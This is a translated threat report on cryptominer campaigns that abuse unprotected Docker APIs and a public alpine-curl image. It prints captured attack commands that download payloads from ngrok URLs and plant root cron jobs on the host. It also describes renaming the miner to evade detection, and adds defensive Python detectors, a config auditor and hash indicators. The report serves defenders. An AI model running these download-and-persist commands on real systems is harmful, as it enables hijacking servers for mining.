Unprotected Docker API and public community images used to distribute cryptocurrency miners


We analysed data collected with the honeypot tools we built to track threats, and we observed significant activity from unwanted or unauthorised cryptocurrency miners deployed as rogue containers using a community-published image on Docker Hub. The image is used as part of a service that delivers malicious cryptocurrency miners.

In addition, network utilities are installed to reach open containers and applications.

We leave our honeypots as they are, that is, with default settings, without security measures or subsequent installation of additional software. Note that Docker publishes recommendations for initial configuration to avoid mistakes and simple vulnerabilities. But the honeypots used here are containers designed to detect attacks aimed at the containerisation platform, not at the applications inside the containers.

The observed malicious activity is also notable because it needs no vulnerability and is independent of the Docker version. Finding a misconfigured, and therefore exposed, container image is all attackers need to infect many open servers.

The unprotected Docker API lets a user run a wide range of commands: listing running containers, fetching logs from a particular container, starting and stopping containers (including forced stops), and even creating a new container from a given image with specified settings.

Figure: On the left is the malware delivery path. On the right is the attackers' environment, which allows remote rollout of images.

Figure: Distribution by country of 3762 exposed Docker APIs. From a Shodan search dated 12.02.2019

Attack chain and payload options

The malicious activity was detected not only with the help of honeypots. Shodan data show that the number of exposed Docker APIs (see the second chart) has grown since we examined a misconfigured container used as a bridge to deliver Monero cryptocurrency mining software. In October of last year (2018; current figures can be viewed this way, translator's note) there were only 856 open APIs.

Analysis of the honeypot logs showed that use of the container image was tied to use of ngrok, a tool for establishing secure connections or forwarding traffic from publicly reachable endpoints to specified addresses or resources (for example, localhost). This lets attackers generate URLs dynamically when delivering a payload to an exposed server. Below are code examples from the logs showing abuse of the ngrok service:

Tty: false
Command: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c "cron || crond"",
Entrypoint: "/bin/sh",

Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c "cron || crond"",
Entrypoint: "/bin/sh"

As you can see, the dropped files are fetched from constantly changing URLs. These URLs have a short lifetime, so the payloads cannot be downloaded after they expire.
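The log excerpts above share one shape: a container created through the exposed API with /bin/sh as entrypoint, a curl download from a throwaway ngrok subdomain into a host directory mounted inside the container, a cron line written to that host's /etc/crontab and /etc/cron.d, and a chroot into the mount to start cron. The following Python detector is an added example, not code from the article or from Trend Micro: it parses entries in the same "Key: value" layout as the excerpts and reports which links of that chain each container-create command matches. The sample log, the ngrok subdomain and the hash in it are constructed placeholders, not real indicators.

```python
import re

# Constructed sample of container-create log entries in the same layout as the
# excerpts above (placeholder ngrok subdomain and hash; not real indicators).
SAMPLE_LOG = '''Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmpa1b2c3/tmp/tmpfileDEADBEEF "hxxp://0123abcd[.]ngrok[.]io/f/serve?l=d&r=DEADBEEF";echo "* * * * * root sh /tmp/tmpfileDEADBEEF" >/tmpa1b2c3/etc/crontab;echo "* * * * * root sh /tmp/tmpfileDEADBEEF" >/tmpa1b2c3/etc/cron.d/1m;chroot /tmpa1b2c3 sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c apt-get update && apt-get install -y ca-certificates",
Entrypoint: "/bin/sh"
'''

# Each rule names one link of the chain seen in the logs. The command is
# refanged (hxxp -> http, [.] -> .) before matching so defanged and live
# log lines are treated alike.
RULES = {
    # download served through a short-lived ngrok tunnel
    "ngrok_tunnel": re.compile(r"https?://[A-Za-z0-9.-]+\.ngrok\.io", re.I),
    # cron line written to /etc/crontab or /etc/cron.d under a non-root prefix,
    # i.e. a host filesystem mounted inside the container
    "host_cron_write": re.compile(r">\s*/[^\s;]+/etc/(?:crontab|cron\.d/)"),
    # chroot into that mount and start the host's cron daemon
    "chroot_cron_start": re.compile(r"chroot\s+\S+\s+sh\s+-c\s+\W*crond?\b"),
    # curl -o into a tmp directory followed by sh on a /tmp path
    "tmp_download_exec": re.compile(r"curl\b.*-o\s+/\S*tmp/\S+.*\b(?:ba)?sh\s+/tmp/"),
}


def _unquote(value):
    """Strip a trailing comma and one layer of surrounding double quotes."""
    value = value.strip().rstrip(",").strip()
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        value = value[1:-1]
    return value


def parse_log_entries(text):
    """Split 'Key: value' lines into one dict per blank-line-separated entry."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = _unquote(value)
    if current:
        entries.append(current)
    return entries


def refang(s):
    return s.replace("hxxp", "http").replace("[.]", ".")


def analyze_entry(entry):
    """Return the sorted names of every rule the entry's command matches."""
    cmd = refang(entry.get("Command") or entry.get("Cmd") or "")
    return sorted(name for name, rx in RULES.items() if rx.search(cmd))


def triage(text):
    """(entrypoint, matched rules) for every entry in a log excerpt."""
    return [(e.get("Entrypoint", ""), analyze_entry(e)) for e in parse_log_entries(text)]


if __name__ == "__main__":
    for entrypoint, hits in triage(SAMPLE_LOG):
        verdict = "SUSPICIOUS" if len(hits) >= 2 else "ok"
        print(f"{verdict:10} entrypoint={entrypoint} rules={hits}")
```

Two or more rule hits on a single create request is the threshold worth alerting on; a lone tmp_download_exec hit also appears in ordinary bootstrap scripts, while host_cron_write and chroot_cron_start only make sense when a host directory has been bind-mounted into the container, which is the misconfiguration the article describes.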

There are two payload variants. The first is a compiled ELF miner for Linux (detected as Coinminer.SH.MALXMR.ATNO) that connects to a mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to fetch certain network tools used to scan network ranges and then look for new targets.

The dropper script sets two variables, which are then used to deploy the cryptocurrency miner. The HOST variable holds the URL where the malicious files are located, and the RIP variable is the file name (in fact, the hash) of the miner to be deployed. The HOST variable changes whenever the hash variable changes. The script also tries to check that no other cryptocurrency miners are running on the attacked server.

Figure: Examples of the HOST and RIP variables, together with the code snippet used to check that no other miners are running.

Before the miner is started it is renamed to nginx. Other versions of this script rename the miner to other legitimate services that may be present in Linux environments. This is usually enough to pass a check against the list of running processes.
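A process-list check that only compares names is exactly what the renaming defeats. The check that survives it compares the process name with where the executable actually lives: a process calling itself nginx whose binary sits in /tmp, was unlinked after start, or has a different file name is worth a look. The Python below is an added example (not the article's or Trend Micro's code) that applies that comparison to a constructed sample process table and, on a Linux host, can read the real table from /proc. The directory lists and sample entries are assumptions chosen for the illustration.

```python
import os
from pathlib import PurePosixPath

# Directories where legitimately installed service binaries live (assumed list).
SYSTEM_BIN_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin",
                   "/usr/local/sbin", "/usr/lib", "/usr/libexec", "/opt")
# Directories any local user can write to; a "service" running from here is odd.
WORLD_WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# Constructed sample process table (not captured from a real host).
SAMPLE_PROCS = [
    {"pid": 101, "comm": "nginx", "exe": "/usr/sbin/nginx"},         # real nginx
    {"pid": 4242, "comm": "nginx", "exe": "/tmp/tmpfileDEADBEEF"},   # renamed miner
    {"pid": 4243, "comm": "nginx", "exe": "/tmp/nginx (deleted)"},   # copied, then unlinked
    {"pid": 300, "comm": "python3", "exe": "/usr/bin/python3.10"},   # benign prefix match
]


def _under(path, dirs):
    return any(path == d or path.startswith(d + "/") for d in dirs)


def classify_process(proc):
    """Return the reasons (possibly none) this process looks like a masquerade."""
    reasons = []
    comm, exe = proc["comm"], proc["exe"]
    deleted = exe.endswith(" (deleted)")          # /proc/<pid>/exe marks unlinked binaries
    exe_path = exe[:-len(" (deleted)")] if deleted else exe
    if deleted:
        reasons.append("executable unlinked after start")
    if _under(exe_path, WORLD_WRITABLE_DIRS):
        reasons.append("executable lives in a world-writable directory")
    if not _under(exe_path, SYSTEM_BIN_DIRS):
        reasons.append("executable outside system binary directories")
    exe_name = PurePosixPath(exe_path).name
    # The kernel caps comm at 15 characters, so accept a prefix match.
    if not exe_name.startswith(comm[:15]):
        reasons.append("process name does not match executable name")
    return reasons


def find_suspicious(procs):
    """Keep only the processes with at least one reason, attaching the reasons."""
    flagged = []
    for proc in procs:
        reasons = classify_process(proc)
        if reasons:
            flagged.append(dict(proc, reasons=reasons))
    return flagged


def read_live_processes():
    """Read comm and exe for every visible process from /proc (Linux only)."""
    procs = []
    for pid in os.listdir("/proc"):
        if not pid.isdigit():
            continue
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue  # kernel threads, processes that already exited, or no permission
        procs.append({"pid": int(pid), "comm": comm, "exe": exe})
    return procs


if __name__ == "__main__":
    table = read_live_processes() if os.path.isdir("/proc") else SAMPLE_PROCS
    for proc in find_suspicious(table or SAMPLE_PROCS):
        print(f"pid {proc['pid']} comm={proc['comm']} exe={proc['exe']}")
        for reason in proc["reasons"]:
            print(f"    - {reason}")
```

Run as root to see every process's exe link; unprivileged runs skip other users' processes. The same exe-versus-comm comparison is what most runtime security agents do, and a pid whose binary is "(deleted)" or lives in /tmp is a far more reliable signal than the name a miner chooses for itself.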

The scanning script also has its own features. It works with the same URL service to deploy the tools it needs. Among them is the zmap binary, used to scan networks and obtain a list of open ports. The script also fetches another binary used to interact with the discovered services and grab banners from them, to determine additional information about each service found (for example, its version).

The script also predefines certain network ranges to scan, though this depends on the script version. It also sets the target ports for the services, in this case Docker, before starting the scan.

As soon as possible targets are found, banners are automatically retrieved from them. The script also filters targets by the services, applications, components or platforms of interest: Redis, Jenkins, Drupal, MODX, Kubernetes Master, Docker 1.16 client and Apache CouchDB. If a scanned server matches any of these, it is saved to a text file that the attackers can later use for further analysis and exploitation. These text files are uploaded to the attackers' servers through a dynamic link, that is, a separate URL is used for each file, which makes subsequent access difficult.

The attack vector is the Docker image, as seen in the two code snippets that follow.

Figure: At the top is the renaming to a legitimate service; below it is how zmap is used to scan the network.

Figure: At the top are the predefined network ranges; below are the specific ports used to search for services, including Docker.

Figure: The screenshot shows that the alpine-curl image has been pulled more than 10 million times.

From Alpine Linux and curl, a resource-efficient CLI tool for transferring files over various protocols, you can build a Docker image. As seen in the screenshot above, this image has already been pulled more than 10 million times. The large pull count may indicate use of this image as an entry point; the image was updated more than six months ago, and users have pulled other images from this repository far less often. In Docker, an entrypoint is the set of instructions used to configure a container so that it runs. If the entrypoint settings are wrong (for example, the container is left exposed to the Internet), the image can be used as an attack vector. Attackers can use it to deliver a payload when they find a misconfigured or exposed container left unattended.

It is important to note that this image (alpine-curl) is not itself malicious, but as shown above it can be used to perform malicious functions. Similar Docker images can also be used for malicious activity. We contacted Docker and worked with them on this issue.

Recommendations

Misconfiguration remains a persistent problem for many companies, especially those adopting DevOps with its focus on fast development and delivery. This is compounded by the need to comply with audit and monitoring requirements, the need to protect data confidentiality, and the substantial damage that follows from failing to do so. Integrating automated security into the development lifecycle not only helps find security holes that would otherwise go unnoticed, but also reduces unnecessary work, such as running extra software builds for every vulnerability or misconfiguration discovered after the application has been deployed.

The incident discussed in this article underlines the need to consider security from the outset, including the following recommendations:

  • For system administrators and developers: always check your API settings to make sure everything is configured to accept requests only from a specific server or the internal network.
  • Follow the principle of least privilege: make sure container images are signed and verified, restrict access to critical components (the container launch service) and add encryption to network connections.
  • Follow the guidelines and enable security mechanisms, for example those from Docker and the built-in security features.
  • Use automated runtime and image scanning to learn more about the processes running in the container (for example, to detect spoofing or look for vulnerabilities). Application control and integrity monitoring help track abnormal changes to servers, files and system areas.
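The first recommendation, and the description earlier in the article of what an unprotected Docker API lets a caller do, both come down to one configuration question: where does the daemon listen, and is a TCP listener protected by TLS client verification? The Python below is an added example, not code from the article, Trend Micro or the Docker project. It audits the two places the listen addresses are normally set, the "hosts" key of /etc/docker/daemon.json and the -H / --host options on the dockerd command line in a systemd unit, and rates each tcp:// listener. The daemon.json keys used (hosts, tls, tlsverify, tlscacert, tlscert, tlskey) are real Docker options; the sample configurations and certificate paths are constructed for the illustration.

```python
import json
import re
import shlex
from urllib.parse import urlsplit

LOOPBACK = {"127.0.0.1", "localhost", "::1"}

# Constructed sample configurations (not taken from any real host).
# Weak: the API on 2375 with no TLS, reachable from every interface.
SAMPLE_DAEMON_JSON_WEAK = '{"hosts": ["tcp://0.0.0.0:2375", "unix:///var/run/docker.sock"]}'
# Hardened: TLS with mandatory client certificates on 2376 (paths are placeholders).
SAMPLE_DAEMON_JSON_HARDENED = """{
  "hosts": ["tcp://0.0.0.0:2376", "unix:///var/run/docker.sock"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""
# The same weak exposure expressed as a systemd ExecStart line.
SAMPLE_EXECSTART_WEAK = (
    "/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375 "
    "--containerd=/run/containerd/containerd.sock"
)


def hosts_from_execstart(execstart):
    """Collect every -H / --host value from a dockerd command line."""
    args = shlex.split(execstart)
    hosts, i = [], 0
    while i < len(args):
        if args[i] in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 2
            continue
        m = re.match(r"^(?:-H|--host)=(.+)$", args[i])
        if m:
            hosts.append(m.group(1))
        i += 1
    return hosts


def tls_flags_from_execstart(execstart):
    """(tls, tlsverify) as set by the dockerd command-line flags."""
    args = shlex.split(execstart)
    tlsverify = any(a in ("--tlsverify", "--tlsverify=true") for a in args)
    tls = tlsverify or any(a in ("--tls", "--tls=true") for a in args)
    return tls, tlsverify


def audit_listeners(hosts, tlsverify, tls=False):
    """Rate each tcp:// listener; unix:// and fd:// are local and skipped."""
    findings = []
    for listener in hosts:
        parts = urlsplit(listener)
        if parts.scheme != "tcp":
            continue
        bind = parts.hostname or "0.0.0.0"   # "tcp://:2375" means all interfaces
        if bind in LOOPBACK:
            severity, note = "low", "loopback only; prefer the unix socket"
        elif tlsverify:
            severity, note = "medium", "network-reachable, client certificate required"
        elif tls:
            severity, note = "high", "encrypted but no client authentication (--tls without --tlsverify)"
        else:
            severity, note = "critical", "unauthenticated remote control of the daemon"
        findings.append({"listener": listener, "bind": bind, "port": parts.port,
                         "severity": severity, "note": note})
    return findings


def audit_daemon_json(text):
    cfg = json.loads(text)
    return audit_listeners(cfg.get("hosts", []),
                           bool(cfg.get("tlsverify", False)), bool(cfg.get("tls", False)))


def audit_execstart(line):
    tls, tlsverify = tls_flags_from_execstart(line)
    return audit_listeners(hosts_from_execstart(line), tlsverify, tls)


if __name__ == "__main__":
    checks = (("weak daemon.json", audit_daemon_json(SAMPLE_DAEMON_JSON_WEAK)),
              ("hardened daemon.json", audit_daemon_json(SAMPLE_DAEMON_JSON_HARDENED)),
              ("weak ExecStart", audit_execstart(SAMPLE_EXECSTART_WEAK)))
    for label, findings in checks:
        for f in findings:
            print(f"{label}: {f['listener']} -> {f['severity']} ({f['note']})")
```

On a real host, feed audit_daemon_json the contents of /etc/docker/daemon.json and audit_execstart the ExecStart line from the docker.service unit; the two must be checked together because dockerd refuses to start when both define hosts. A "critical" finding means anyone who can reach that port can create a container with a host bind mount, which is the exact primitive the chain in this article relies on; "medium" still deserves a firewall rule limiting the port to the management network, as the first recommendation says.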

Trend Micro helps DevOps teams build securely, release fast and run anywhere. Trend Micro Hybrid Cloud Security provides powerful, streamlined and automated security across an organisation's DevOps pipeline and delivers multiple threat defence techniques from XGen security for physical, virtual and cloud workloads at runtime. It also adds container security with Deep Security and Deep Security Smart Check, which scans Docker container images for malware and vulnerabilities at any point in the development pipeline to stop threats before they are deployed.

Indicators of compromise

Related hashes:

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

In the Docker video course, practising speakers show which settings should be configured first to minimise the likelihood of, or completely avoid, the situation described above. And on August 19-21 at the online intensive DevOps Tools & Cheats you can discuss these and similar security problems with colleagues and practising instructors at a round table, where everyone can speak and listen to the pains and successes of experienced colleagues.

Source: www.habr.com
